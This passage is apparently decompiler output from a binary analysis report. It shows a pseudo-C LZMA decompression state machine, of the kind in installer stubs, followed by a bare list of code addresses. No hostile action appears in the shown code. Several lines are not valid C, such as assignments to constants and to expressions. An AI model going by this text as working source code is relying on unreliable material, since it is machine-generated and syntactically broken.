												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                                  0x00000000
                                                  0x00406ffe
                                                  0x00406ffe
                                                  0x00407002
                                                  0x00407023
                                                  0x0040702a
                                                  0x00407030
                                                  0x00407036
                                                  0x00407048
                                                  0x0040704e
                                                  0x00407053
                                                  0x00000000
                                                  0x00407004
                                                  0x0040700a
                                                  0x004073cb
                                                  0x004073cb
                                                  0x004073cb
                                                  0x004073ce
                                                  0x004073ce
                                                  0x004073ce
                                                  0x004073d4
                                                  0x004073da
                                                  0x004073e0
                                                  0x004073fa
                                                  0x004073fd
                                                  0x00407403
                                                  0x0040740e
                                                  0x00407410
                                                  0x004073e2
                                                  0x004073e2
                                                  0x004073f1
                                                  0x004073f5
                                                  0x004073f5
                                                  0x0040741a
                                                  0x00000000
                                                  0x00000000
                                                  0x0040741c
                                                  0x00407420
                                                  0x004075cf
                                                  0x004075e5
                                                  0x004075ed
                                                  0x004075f4
                                                  0x004075f6
                                                  0x004075fd
                                                  0x00407601
                                                  0x00407601
                                                  0x0040742c
                                                  0x00407433
                                                  0x0040743b
                                                  0x0040743e
                                                  0x00407441
                                                  0x00407441
                                                  0x00407447
                                                  0x00407447
                                                  0x00406be3
                                                  0x00406be3
                                                  0x00406be3
                                                  0x00406bec
                                                  0x00000000
                                                  0x00000000
                                                  0x00406bf2
                                                  0x00000000
                                                  0x00406bfd
                                                  0x00000000
                                                  0x00000000
                                                  0x00406c06
                                                  0x00406c09
                                                  0x00406c0c
                                                  0x00406c10
                                                  0x00000000
                                                  0x00000000
                                                  0x00406c16
                                                  0x00406c19
                                                  0x00406c1b
                                                  0x00406c1c
                                                  0x00406c1f
                                                  0x00406c21
                                                  0x00406c22
                                                  0x00406c24
                                                  0x00406c27
                                                  0x00406c2c
                                                  0x00406c31
                                                  0x00406c3a
                                                  0x00406c4d
                                                  0x00406c50
                                                  0x00406c5c
                                                  0x00406c84
                                                  0x00406c86
                                                  0x00406c94
                                                  0x00406c94
                                                  0x00406c98
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406c88
                                                  0x00406c88
                                                  0x00406c8b
                                                  0x00406c8c
                                                  0x00406c8c
                                                  0x00000000
                                                  0x00406c88
                                                  0x00406c62
                                                  0x00406c67
                                                  0x00406c67
                                                  0x00406c70
                                                  0x00406c78
                                                  0x00406c7b
                                                  0x00000000
                                                  0x00406c81
                                                  0x00406c81
                                                  0x00000000
                                                  0x00406c81
                                                  0x00000000
                                                  0x00406c9e
                                                  0x00406c9e
                                                  0x00406ca2
                                                  0x0040754e
                                                  0x00000000
                                                  0x0040754e
                                                  0x00406cab
                                                  0x00406cbb
                                                  0x00406cbe
                                                  0x00406cc1
                                                  0x00406cc1
                                                  0x00406cc1
                                                  0x00406cc4
                                                  0x00406cc8
                                                  0x00000000
                                                  0x00000000
                                                  0x00406cca
                                                  0x00406cd0
                                                  0x00406cfa
